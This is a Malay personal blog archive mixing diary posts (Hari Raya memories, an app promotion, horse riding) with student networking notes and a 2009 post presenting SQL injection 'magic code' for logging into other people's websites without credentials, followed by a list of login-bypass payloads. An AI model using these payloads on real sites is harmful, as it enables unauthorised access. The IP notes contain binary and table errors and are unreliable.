Tuesday, July 30, 2013

Mai IQra

Aplikasi Mai IQRA untuk pengguna telefon bimbit platform ANDROID


Aplikasi Mai IQra adalah untuk pengguna telefon pintar platform Android. aplikasi ini adalah untuk mengajar kanak-kanak membaca iqra dan mengenal huruf.


“Didiklah anak-anakmu dengan tiga perkara: mencintai Nabimu; mencintai ahlul baitnya; dan membaca al-Quran, kerana orang-orang yang memelihara al-Quran itu berada dalam lindungan singgasana Allah pada hari ketika tidak  ada perlindungan selain daripada perlindunga-Nya; mereka berserta para nabi-Nya dan  orang-orang suci.(Ath-Tabrani)

Rasulullah s.a.w bersabda yang bermaksud:
“Orang yang paling baik lagi mulia disisi Allah s.w.t diantara kamu semua ialah orang yang belajar al-Quran kemudian ia mengajarkannya kepada orang lain. (Riwayat Bukhari)



DAPATKAN DENGAN SEGERA APLIKASI MAI IQRA!!!!!!
DENGAN MUAT TURUN DI GOOGLE PLAY



Monday, September 5, 2011

Raya Oh Raya 2011

I'm back......dah lama yantimun menyepi kini ku kembali kita lupakan sebentar ke munculanku kembali untuk berkarya di laman blog nie....

Tahun nie raya ku amat bermakna selama 2 tahun aku tidak dapat berpuasa dengan family selama ini aku berpuasa di perantauan. semasa berpuasa di perantuan aku hanya bersahur dgn air suam dan roti bersama-sama dengan rakan sebilikku selamat la ada adik2 yang sama dengan blokku rajin bersahur dengan ku terubat sikit rasa hati pada mak,abah dan adik2.

Tahun ini aku ambil kesempatan yang dah lama aku tidak kecapi nikmat berpuasa yang sebenar.setiap pagi aku akan bangun untuk siapkan makanan untuk mak,abah dan adik2 ku. petangnya akan ku sediakan juadah untuk berbuka walaupun pun aku penat semua itu bukan penghalang untuk aku untuk siapkan juadah untuk berbuka nanti.aku sentiasa melengkapkan diet yang sihat untuk juadah yang aku siapkan untuk family ku.Raya tahun ini kelamkabut sikit mahu tidaknya semua orang sibuk nak raya kami pulak sibuk dengan rumah tengah renovation kelam kabut dijangka renovation boleh siap dalam sebulan tapi tak siap2. Itu semua tidak menghalang kami adik beradik beraya sakan tahun ini.

setelah genap 30 hari umat islam berpuasa kini tiba la Raya...Raya Oh Raya....hahaha sukanya teringat zaman kanak2 dulu jika raya menjelang nie yang aku ,adik2 dan rakan-rakan seberek dengan kami nie la masanya kami pusing 1 berek dan taman berdekatan untuk kumpul duit raya .dulu kalau dapat duit raya 50sen pun dah rasa banyak kalau sekarang lain lak jadinya mau tidaknya aku bagi RM1 lepas je aku bagi duit raya dengar la budak2 tu cakap kedekutnya kakak tu seringgit je dia bagi aku dengar macam nak cubit je pipi budak2 nie... je selamat le anak orang kalau anak aku dah lama aku tarik telinga dia.

kembali kepada kepada cerita sebenar yang aku nak ceritakan tahun ini aku berjumpa kembali rakan-rakan sekolah yang lebih 10 tahun aku tidak jumpa. pada minggu2 terakhir puasa aku dan best friend forever shopping baju raya dah lama aku tak jadi kutu embun dalam pukul 3 pagi baru le aku sampai rumah.


Pada raya pertama aku pergi ke kubur atuk dan nenek. surah al-fatihah dan surah yassin kami sedekahkan terasa sayu hati ini genap 5 tahun pemergian atuk dan nenek terimbau kembali kenangan ku beraya dengan atuk dan nenek .bila tiba je raya kami sekeluarga rasa seronok nak balik kampung untuk beraya dengan atuk dan nenek. Bila kami sampai je di kampung atuk dan nenek akan sambut kepulangan kami . atuk yang paling gembira jika kami adik beradik balik mahu tidaknya kami la cucu yang paling rapat dengan atuk.setiap hari raya atuk akan belikan kami bunga api dan mercun untuk kami. bunga api dan mercun senyap2 atuk belikan untuk kami adik beradik tanpa pengetahuan nenek kalau nenek tahu sah2 la atuk kena ceramah dengan nenek.manakala pada malam raya kami cucu perempuan tak dibenarkan main dan ditugaskan untuk mengemas rumah dan tolong nenek didapur tapi aku nie cucu yang paling degil dan nakal ade saje idea untuk aku lari dari kerja2 tu.selalunya aku berjaya dengan tipu helah yang aku buat itu pun atas bantuan atuk.itu semua kenangan yang tak dapat aku lupakan semasa beraya dengan atuk dan nenek di kampung.

Setelah pulang dari menziarah kubur atuk dan nenek kami sekeluarga beraya kerumah mak cik habis je beraya di rumah mak cik entah macam mana mak dan abah teringat nak beraya di rumah kawan sekerja dengan ayah dulu bila abah sebut je nama pak cik nie aku dah fobia mahu tidaknya kenangan 15 tahun yang amat menyakitkan sehingga aku fobia dengan berkata cinta.aku imbau kembali kenangan 15 tahun yang lalu masa tu aku tingkatan 3 bakal menghadapi PMR masa ini orang duk kata cinta monyet. Pak cik nie jiran sebelah rumah kami dan dia ada 4 orang anak 1 perempuan 3 lelaki anak yang nombor 2 nie sebaya dengan aku dia sekolah agama hanya kadang2 je bila hari minggu dia balik rumah aku pun bukan rapat sangat dengan dia aku paling rapat dengan kakak dan adik2 dia.boleh dijadikan cerita macam mana adik beradik dia nie cuba rapatkan kami pada mulanya aku paling anti dengan dia mahu tidaknya bila dia jumpa dengan aku ade saja ceramah agama yang tidak berbayar aku dengar suruh aku jadi baik la untuk jadi contoh.kadang2 aku saja buat muka selamba aku suka kata kat dia "ustaz .....kalau suka sangat nak bagi ceramah dekat saya itu semua buang masa ustaz je sebab saya nie budak jahat tak suka nak dengar ceramah ustaz lebih baik ustaz bagi dekat orang yang nak dengar ustaz bagi ceramah" entah macam mana aku ada dapat panggilan daripada dia pada mulanya aku ingat kawan sekolah rupa2 dia entah macam mane nie la kali pertama aku rasa jantung berdenyut kencang aku rasa aku dah jatuh cinta dengan dia.maka terungkai la misteri yang dia sembunyikan dari aku.rupanya dalam senyap dia minat dengan aku dan semua perbuatan dia yang saja buat aku sakit hati itu semua adalah cara dia cuba nak dekati aku.sejak dari hari itu kami dah bertambah dekatdan rapat. mak dan ayah kami sedar yang kami nie semakin dekat kadang2 ade saja usikan dari keluarga kami nak berbesan la.hari yang boleh aku fobia dengan cinta adalah hari dimana ayah dan mak dia nak buat jamuan tukar rumah keluarga dia minta mak dan ayah aku bantu masak di rumah baru mereka dan ada buat panggang ayam jadi malam tu aku dan dia siapkan bara api untuk panggang ayam entah macam mana mak dia panggil aku untuk ambil ayam yang nak dipanggang semasa aku nak kedapur aku terserempak dengan sepupu dia yang minat sangat kat dia di jadikan cerita masa aku nak pergi dekat dia yang masa tu berbual dengan sepupu dia tergila2 sangat kat dia tu tergedik2 aku tengok dengan selamba dia tanya"awk sape ye yang awk kata terhegeh2 minat kat awk tu' dengan selamba dia kata kat sepupu dia budak yang duduk kat sebelah aku tadi masa tu aku rasa dia tak perasan aku kat belakang dia je sambil bertentang dengan sepupu dia.dengan hati yang panas aku kata nah kau bakar la sorang2 aku kan perempuan gedik yang terhegeh2 la nie kita dah tak kenal satu sama lain ok kau boleh belah.masa tu dia ade gak kejar aku untuk jelaskan pada masa tu memang hati aku macam dicabut.masa tu memang aku ego tak nak lansung dengar penjelasan dari dia pada aku dia penipu besar. sejak dari hari tu aku cuba elak jumpa dengan dia nak di jadikan cerita ayah aku pindah ke rumah kami jadi keluarga kami terputus terus hubungan dengan keluarga dia.sejak dari peristiwa tu aku jadi benci dengan lelaki aku rasa lelaki nie penipu.tapi raya nie menjadi sejarah bila keluarga aku ingin beraya kerumah keluarga dia .sampai je dekat rumah dia kami sekeluarga disambut oleh seorang pemuda boleh dikatakan tampan la.mata aku dan pemuda tersebut bertembung aku dan pemuda tersebut hanya membalas senyum. bagai nak luruh jantung aku bila aku dengar mak dia panggil nama dia ya allah hanya tuhan sahaja yang tahu ape perasan aku masa tu .masa aku dekat rumah dia aku buat muka biasa je mak dia banyak tanya tentang aku maka keluar la cerita dari mak dia bersungut anak mak cik yang sorang nie entah bila la nak kawin kawan2 dia semua dah kawin cuma dia nie je tak kawin ape yang ditunggu pun mak cik tak tahu. dengan selamba dia cakap sapa la sudi dekat dia entah macam mana mata kami bertembung sekali lagi kali nie entah macam mana jantung aku berdenyut kencang dengan cepat aku larikan lirikan mataku dari lirikan mata dia yang dah lama aku rindu untuk melihatnya. entah la sepanjang aku dekat rumah dia aku rasa macam ada mata yang tak lekang memerhatikan aku.pada masa tu aku rasa nak cepat je balik.

Manakala
pada hari raya kedua aku beraya sakan dengan best friend aku sukanya aku dah lama aku tak jumpa dengan member2 aku .kami sempat la beraya sakan.

Tuesday, February 9, 2010

pengalaman belajar kemahiran asas kuda di UTM skudai.


ni pengalaman pertama saya berdepan dengan kuda.kadang2 orang ade berkata haiwan tak punya perasaan tetapi kita silap kuda amat sensitif .mcm kita juga ade perasaan untuk dibelai dan di manja.pada mulanya aku takut sikit-sikit aku cuba dekatinya,ade satu perasaan yang dekat dan mudah didekati.

Sunday, July 12, 2009

SQL INJECTION(MAGIC CODE)

MAGIC CODE

Magic code adalah slh satu code untuk memasuki website org lain tanpa username dan password.contoh magic code:

1' or '1'='1



ada byk magic code yg bo digunakan untuk SQL injection.di bwh ini ada senarai mgic code yg bo digunakan.kita bo mencari magic code lain dlm internet.



‘or 1=1–

‘or 0=0 –

‘or ‘x’='x

‘or a=a-

“or 0=0 –

“or 0=0 #

“or “x”=”x“)or(”

a”=”aadmin’–

hi” or 1=1 –

hi’ or’a'=’ahi”)or(”

a”=”aor 0=0 #

‘or a=a–

‘or 0=0 #

‘having 1=1–

“or 1=1–

“or “a”=”a

‘)or(’a'=’a

‘)or(’x'=’x

hi” or “a”=”a

hi’ or 1=1 –

hi’)or(’a'=’a

or 0=0 –

or 1=1–

Friday, June 5, 2009

5 Jun 2009

gateway

  1. * Ia merupakan suatu titik yang berperanan sebagai pintu masuk ke rangkain yang lain.
  2. * Dalam persekitaran Internet, suatu nod atau titik berhenti boleh dijadikan nod gateway atau nod ?host?.
  3. * Kedua-dua penggunga komputer dalam Internet dan komputer yang menyediakan laman web kepada pengguna di kenalpasti sebagai nod host. Komputer yang mengawal lalu lintas rangkaian pada ISP (Internet Service Provider; cth, JARING, TMNET, MAXISNET) merupakan nod gateway.
  4. * Di dalam rangkaian bagi sesebuah organisasi, pelayan komputer akan berfungsi sebagai nod gateway yang mana ia turut bertindak sebagai ?proxy server? dan ?firewall server?.
  5. * Lanjutan itu, gateway akan berganding bahu dengan router dalam menentukan laluan mana yang harus dilalui bagi paket data bila ia tiba pada gateway.
  6. Gateway boleh terdiri dari peranti seperti protocol translators, impedance matching devices, rate converters, fault isolators atau signal translators seperti mana yang diperlukan untuk menyediakan interoperabiliti sistem. Ia turut dikatakan menjadi pemandu arah trafik dengan betul dari satu trafik ke satu trafik yang lain, sementara mengekalkan trafik-trafik dalam rangkaian-rangkaian tersebut berasingan. Gateway melibatkan penyatuan berbagai ciri-ciri rangkaian yang berlainan ke dalam satu peranti untuk menyediakan storan dan juga pertukaran protokol. Gateway turut digunakan untuk menyambungkan satu jenis rangkaian setempat dengan rangkaian setempat yang lain seperti Ethernet dengan token ring, atau LAN dengan SNA dan LAN dengan X.25. Gateway boleh beroperasi pada ketujuh-tujuh peringkat OSI dan ia adalah berorientasikan aplikasi. Selain dari itu, gateway bertanggungjawab untuk menghubungkan sistem-sistem mail elektronik yang tidak serasi atau tidak compatible, menukar dan memindahkan fail dari satu sistem kepada sistem lain atau membolehkan interoperabilti antara sistem-sistem pengoperasi yang berbeza. Kebaikan Gateway: - Ia menghubungkan 2 rangkaian yang menggunakan senibina yang berbeza. Keburukan Gateway: - Sekiranya gateway rosak, maka rangkaian tidak dapat berhubung antara satu sama lain.Ia merupakan suatu titik yang berperanan sebagai pintu masuk ke rangkain yang lain. Dalam persekitaran Internet, suatu nod atau titik berhenti boleh dijadikan nod gateway atau nod ?host?. Kedua-dua penggunga komputer dalam Internet dan komputer yang menyediakan laman web kepada pengguna di kenalpasti sebagai nod host. Komputer yang mengawal lalu lintas rangkaian pada ISP (Internet Service Provider; cth, JARING, TMNET, MAXISNET) merupakan nod gateway. Di dalam rangkaian bagi sesebuah organisasi, pelayan komputer akan berfungsi sebagai nod gateway yang mana ia turut bertindak sebagai ?proxy server? dan ?firewall server?. Lanjutan itu, gateway akan berganding bahu dengan router dalam menentukan laluan mana yang harus dilalui bagi paket data bila ia tiba pada gateway. Gateway boleh terdiri dari peranti seperti protocol translators, impedance matching devices, rate converters, fault isolators atau signal translators seperti mana yang diperlukan untuk menyediakan interoperabiliti sistem. Ia turut dikatakan menjadi pemandu arah trafik dengan betul dari satu trafik ke satu trafik yang lain, sementara mengekalkan trafik-trafik dalam rangkaian-rangkaian tersebut berasingan. Gateway melibatkan penyatuan berbagai ciri-ciri rangkaian yang berlainan ke dalam satu peranti untuk menyediakan storan dan juga pertukaran protokol. Gateway turut digunakan untuk menyambungkan satu jenis rangkaian setempat dengan rangkaian setempat yang lain seperti Ethernet dengan token ring, atau LAN dengan SNA dan LAN dengan X.25. Gateway boleh beroperasi pada ketujuh-tujuh peringkat OSI dan ia adalah berorientasikan aplikasi. Selain dari itu, gateway bertanggungjawab untuk menghubungkan sistem-sistem mail elektronik yang tidak serasi atau tidak compatible, menukar dan memindahkan fail dari satu sistem kepada sistem lain atau membolehkan interoperabilti antara sistem-sistem pengoperasi yang berbeza. Kebaikan Gateway: - Ia menghubungkan 2 rangkaian yang menggunakan senibina yang berbeza. Keburukan Gateway: - Sekiranya gateway rosak, maka rangkaian tidak dapat berhubung antara satu sama lain.

Thursday, June 4, 2009

wireless and data comunication

1 JUN 2009






TCP/IP protocol

* Transmission Control Protocol/Internet Protocol (TCP/IP) adalah protokol yang diterima pakai untuk kegunaan Wide Area Network (WAN), Local Area Network (LAN) dan Internet.

*TCP - Penerima akan menghantar balik pengesahan kepada pengirim
TCP dikenali sebagai connection-oriented protocol


* UDP - Pengirim akan menghantar data tanpa perlu menunggu balasan dari pihak penerima. Dengan kata lain, pengirim tidak ambil peduli sama ada data tersebut sampai kedestinasi atau tidak.
UDP juga dikenali sebagai connectionless.


Alamat IP (IP Addressing)


*Setiap alamat IP terbahagi kepada 2 bahagian, iaitu Network ID dan Host ID.
Network ID umpama Jalan Utama, manalah Host ID merupakan alamat rumah yang ada di dalam jalan Utama .


* Alamat IP bersaiz 32 bit dan dibahagikan kepada empat bahagian, iaitu setiap bahagian mempunyai 8 bit.

Binary Nilai Bit Decimal

00000000 0 0

00000001 1 1

00000011 1+2 3

00000111 1+2+4 7

00001111 1+2+4+8 15

00011111 1+2+4+8+16 31

00111111 1+2+4+8+16+32 63

01111111 1+2+4+8+16+32+64 127

11111111 1+2+4+8+16+32+64+128 255



Contoh penukaran binary kepada Decimal

Terdapat 5 jenis kelas Alamat yang ada iaitu A, B, C, D dan E.
· Kelas A bit pertama mesti bermula dengan 0.
· Kelas B 2 bit mesti bermula dengan 10.
· Kelas C 3 bit mesti bermula dengan 110.
· Kelas D 4 bit mesti bermula dengan 1110.
· Kelas E 4 bit mesti bermula dengan 1111.


  1. · Julat alamat Kelas A diantara 1 sehingga 126.
  2. · Julat alamat Kelas B diantara 128 sehingga191.
  3. · Julat alamat Kelas C diantara 192 sehingga223.
  4. · Julat alamat Kelas D diantara 224 sehingga 239·
  5. . Julat alamat Kelas E diantara 240 sehingga 255.
Walaubagaimanapun kita hanya dibenarkan menggunakan kelas dari jenis A, B dan C sahaja. Alamat IP mempunyai 32 bit dan dipecahkan kepada 4 bahagian yang mana setiap satu mempunyai 8 bit dan kita wakili setiap bahagian sebagai w.x.y.z . Sekiranya alamat IP tersebut adalah 191.254.253.13, w = 191, x =254, y =253 dan z = 13 atau dalam bentuk binari adalah:

10111111.11111110.11111101.00001101 = 191.254.253.13

Cara mengiranya adalah dengan nilai decimal kepada binari seperti ini:
(rujuk rajah pertukaran binari kepada decimal)

Kalau 1 kita ambil nilai decimal mengikut kedudukannya di dalam bentuk binari dan nilai 0 untuk binari 0.

191 = 1011111 = 128 + 0 + 32 + 16 + 8 + 4 + 2 + 1

254 = 1111110 = 128 + 64 + 32 + 16 + 8 + 4 + 2 + 0

253 = 1111101 = 128 + 64 + 32 + 16 + 8 + 4 + 0 + 1

13 = 00001101 = 0 + 0 + 0 + 0 + 8 + 4 + 0 + 1

Subnetting
*Mengurangkan trafik di dalam rangkaian Optima prestasi rangkaianMudah dikendalikan

Alamat Kelas A (Class A)


Alamat IP dibahagi kepada 4 bahagian iaitu w.x.y dan z. Dimana setiap huruf akan diwakili dengan 8 bit.

Undang-undang mengatakan bit yang pertama mesti 0 (pertama dari belah kanan), merujuk kepada 8 bit pada w. Maka nilai bit bermula dari 00000000 sehingga 01111111.
Nilai binari kepada decimal.

Decimal = binari
0 = 00000000
1 = 00000001
2 = 00000010
3 = 00000011
4 = 00000100
5 = 00000101
6 = 00000110
7 = 00000111
8 = 00001000
dan seterusnya sehingga
126 = 01111110
127 = 01111111 (ini nilai yang terakhir, sebab bit yang pertama mesti 0 untuk IP kelas A)

Maka IP kelas A bermula dari 0 hingga 127 TETAPI nilai 0 merupakan network number dan tidak boleh digunakan dan 127 merupakan local loop back (digunakan untuk melakukan ujian terhadap diri sendiri seperti menggunakan arahan ping pada alamat IP sendiri), juga tidak boleh digunakan. Oleh itu IP kelas A bermula dari 1 sehingga 126.

Sekiranya kita melihat alamat IP seperti ni 1.10.134.8 kita tahu ianya di dalam IP kelas A. Ini kerana pangkal 1 adalah di dalam IP kelas A. Begitu juga IP 13.233.222.32 berada di dalam IP kelas A.


Alamat Kelas B (Class B)

Undang-undang mengatakan 2 bit permulaan mestilah 10 (dari sebelah kanan), merujuk kepada 8 bit pada w. Maka nilai bit bermula dari 10000000 sehingga 10111111.
Nilai binari kepada decimal.

Decimal = binari
128 = 10000000
129 = 10000001
130 = 10000010
131 = 10000011
132 = 10000100
133 = 10000101
134 = 10000110
135 = 10000111
136 = 10001000
dan seterusnya sehingga
190 = 10111110
191 = 10111111 (ini nilai yang terakhir, sebab 2bit permulaan mestilah 10 untuk IP kelas B)

Maka julat alamat IP kelas B bermula dari 128 sehingga 191. Sekiranya alamat IP tersebut adalah 155.76.76.8, nilai 155 menunjukkan alamat IP tersebut berada di dalam kelas B.

Alamat Kelas C (Class C)

Undang-undang mengatakan 3 bit permulaan mestilah 110 (dari sebelah kanan), merujuk kepada 8 bit pada w. Maka nilai bit bermula dari 11000000 sehingga 11011111.
Nilai binari kepada decimal.
Decimal = binari
192 = 11000000
193 = 11000001
194 = 11000010
195 = 11000011
196 = 11000100
197 = 11000101
198 = 11000110
199 = 11000111
200 = 11001000
dan seterusnya sehingga
222 = 11011110
223 = 11011111 (ini nilai yang terakhir, sebab 3 bit permulaan mestilah 110 untuk IP kelas C).

Maka julat alamat IP kelas C bermula dari 192 sehingga 223. Sekiranya alamat IP tersebut adalah 200.76.76.8, nilai 200 menunjukkan alamat IP tersebut berada di dalam kelas C.

Alamat Kelas D (Class D)

Undang-undang mengatakan 4 bit permulaan mestilah 1110 (dari sebelah kanan), merujuk kepada 8 bit pada w. Maka nilai bit bermula dari 111000000 sehingga 111011111.
Nilai binari kepada decimal.

Decimal = binari
224 = 11100000
225 = 11100001
226 = 11100010
225 = 11100011
227 = 11100100
228 = 11100101
229 = 11100110
230 = 11100111
231 = 11101000
dan seterusnya sehingga
238 = 11101110
239 = 11101111 (ini nilai yang terakhir, sebab 4 bit permulaan mestilah 1110 untuk IP kelas D).

Maka julat alamat IP kelas D bermula dari 224 sehingga 239. Sekiranya alamat IP tersebut adalah 230.76.76.8, nilai 230 menunjukkan alamat IP tersebut berada di dalam kelas D.

Alamat Kelas E (Class E)

Undang-undang mengatakan 4 bit permulaan mestilah 1111 (dari sebelah kanan), merujuk kepada 8 bit pada w. Maka nilai bit bermula dari 111100000 sehingga 111111111.
Nilai binari kepada decimal.

Decimal = binari
240 = 11110000
241 = 11110001
242 = 11110010
243 = 11110011
244 = 11110100
245 = 11110101
246 = 11110110
247 = 11110111
248 = 11111000
dan seterusnya sehingga
254 = 11111110
255 = 11111111 (ini nilai yang terakhir, sebab 4 bit permulaan mestilah 1111 untuk IP kelas E).

Maka julat alamat IP kelas E bermula dari 240 sehingga 255. Sekiranya alamat IP tersebut adalah 243.76.76.8, nilai 243 menunjukkan alamat IP tersebut berada di dalam kelas E.


Nota:
Alamat IP yang dibenarkan untuk digunakan hanyalah IP kelas A, B dan C. IP kelas D sering digunakan untuk multicast seperti yang digunakan di dalam protocol OSPF. IP kelas E pula digunakan untuk ujian.


Subnet Mask

Di dalam protocol IP, selain memberikan alamat IP kita perlu juga mengisikan ruangan Subnet Mask. Terdapat default subnet mask untuk setiap kelas.

IP kelas A 255.0.0.0
IP kelas B 255.255.0.0
IP kelas C 255.255.255.0

Sebagai contoh:

Alamat IP 10.100.10.1, default subnet mask adalah 255.0.0.0
Alamat IP 191.254.1.23 default subnet mask adalah 255.255.0.0
Alamat IP 192.168.3.1 default subnet mask adalah 255.255.255.0
Selain daripada default subnet mask yang dikhaskan untuk setiap kelas, IP kelas A boleh menggunakan default subnet mask kelas B dan C. Manakala IP kelas B boleh menggunakan default subnet mask kelas B dan C. Tetapi IP kelas C hanya boleh menggunakan default subnet mask kelas C.

JANGAN guna IP kelas C dan default subnet mask kelas A atau B. Walaupun komunikasi berjaya dilakukan tetapi mengundang masalah apabila terdapat dua jenis alamat IP digunakan.

JANGAN guna alamat IP yang berakhir dengan nombor 0 dan 255. Seperti 192.168.10.0 dan 192.168.10.255 (untuk kelas C), 191.254.0.0 dan 191.254.255.255 (untuk kelas B), 10.0.0.0 dan 10.255.255.255 (untuk kelas A). Sebab 0 merupakan nombor network dan 255 merupakan nombor broadcast.
JANGAN guna alamat IP lebih besar dari 255 sebab nombor tersebut tidak wujud.